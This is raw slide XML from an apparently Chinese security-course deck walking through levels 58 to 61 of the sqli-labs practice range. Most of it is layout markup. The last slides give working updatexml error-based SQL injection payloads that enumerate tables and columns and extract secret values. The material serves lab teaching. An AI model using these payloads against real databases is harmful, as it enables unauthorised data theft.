            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2064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96" name="Rectangle 194"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776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97" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2064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98" name="Rectangle 196"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632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99" name="Rectangle 197"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776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0" name="Rectangle 198"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920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1" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2064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2" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1632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3" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1920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4" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1776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5" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1920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6" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="2064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7" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2064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8" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2064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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="8382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110" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="4256088"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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111" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="304830" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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112" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888"/>
            <a:ext cx="406440" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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22540" y="2732088"/>
            <a:ext cx="8840070" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="360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759570" y="3494088"/>
            <a:ext cx="7519140" cy="3810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pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO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78865" y="1437005"/>
            <a:ext cx="3223895" cy="126365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28449" y="355600"/>
            <a:ext cx="8685538" cy="4873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E0E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="87122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FB4DC4-41B9-4E61-AD6F-4DDEA2B45915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稻壳儿春秋广告/盗版必究        原创来源：http://chn.docer.com/works?userid=199329941#!/work_time"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519470" y="-2"/>
            <a:ext cx="8673163" cy="4336356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8672711"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX1" fmla="*/ 8672711 w 8672711"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX2" fmla="*/ 4336356 w 8672711"/>
              <a:gd name="connsiteY2" fmla="*/ 4336356 h 4336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72711" h="4336356">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8672711" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336356" y="433635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18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="104457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1027" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="10445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ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776"/>
              <a:ext cx="95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38" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065"/>
              <a:ext cx="95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39" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95" cy="97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40" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776"/>
              <a:ext cx="95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41" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920"/>
              <a:ext cx="95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42" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065"/>
              <a:ext cx="95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43" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97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44" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97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45" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97" cy="97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46" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98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47" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98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48" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98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49" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98" cy="97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50" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920"/>
              <a:ext cx="97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51" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97" cy="97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52" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776"/>
              <a:ext cx="97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53" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920"/>
              <a:ext cx="97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54" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065"/>
              <a:ext cx="97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55" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="95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56" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065"/>
              <a:ext cx="95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57" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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58" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776"/>
              <a:ext cx="95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59" name="Rectangle 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920"/>
              <a:ext cx="95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60" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065"/>
              <a:ext cx="95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61" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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62" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920"/>
              <a:ext cx="95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63" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776"/>
              <a:ext cx="97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64" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920"/>
              <a:ext cx="97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65" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065"/>
              <a:ext cx="97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66" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065"/>
              <a:ext cx="95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67" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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1030" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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1031" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800"/>
            <a:ext cx="406440" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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1032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711270" y="1295400"/>
            <a:ext cx="10923075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5588550" y="6505575"/>
            <a:ext cx="1117710" cy="2619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0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DCFB4DC4-41B9-4E61-AD6F-4DDEA2B45915}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103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1500864" y="262255"/>
            <a:ext cx="8685538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>
    <p:fade/>
  </p:transition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3399FF"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="v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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="26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图片占位符 1"/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3" y="8253"/>
            <a:ext cx="12242310" cy="6933462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4035198" y="5682600"/>
            <a:ext cx="4183920" cy="5505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3000" b="0" strike="noStrike" spc="-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讲师：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" b="0" strike="noStrike" spc="-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朝阳</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470078" y="4988520"/>
            <a:ext cx="3313440" cy="4889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600" b="0" strike="noStrike" spc="-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掌控安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-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144479" y="2564686"/>
            <a:ext cx="8239217" cy="860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endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="-1">
              <a:solidFill>
                <a:srgbClr val="002060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en-US" altLang="zh-CN" sz="3200" b="1" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>sql-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="楷体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>靶场原理详解（十四）</a:t>
            </a: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第五十八关</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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118DA96-F05B-4C08-B9A0-8727ADA1A709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451484" y="2060848"/>
            <a:ext cx="93610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查表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='9avnx1khkg'),0x7e),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'and updatexml(1,(concat(0x7e,(select secret_5HUW from 9avnx1khkg),0x7e)),1) -- qwe</a:t>
            </a:r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zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>五十九关</a:t>
            </a:r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9453E18-AA16-41B4-99D7-5196428FBBDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451484" y="2060848"/>
            <a:ext cx="93610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查表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='zwvfx62mzk'),0x7e),1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and updatexml(1,(concat(0x7e,(select secret_TXWF from zwvfx62mzk),0x7e)),1) -- qwe</a:t>
            </a:r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第六十关</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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4981D38-5AA3-465C-ADAA-D9BD38CE9130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451484" y="2060848"/>
            <a:ext cx="93610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查表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>")and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>")and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='3s8duz4pa9'),0x7e),1) -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>")and updatexml(1,(concat(0x7e,(select secret_9RFA from 3s8duz4pa9),0x7e)),1) -- qwe</a:t>
            </a:r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第六十一关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F48D414-DE71-456D-9EFF-149A7C56AFCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451484" y="2060848"/>
            <a:ext cx="93610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查表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'))and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查列：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'))and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='y7rqnt6tpp'),0x7e),1) -- qwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查数据：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'))and updatexml(1,(concat(0x7e,(select secret_GR2F from y7rqnt6tpp),0x7e)),1) -- qwe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/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sx272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
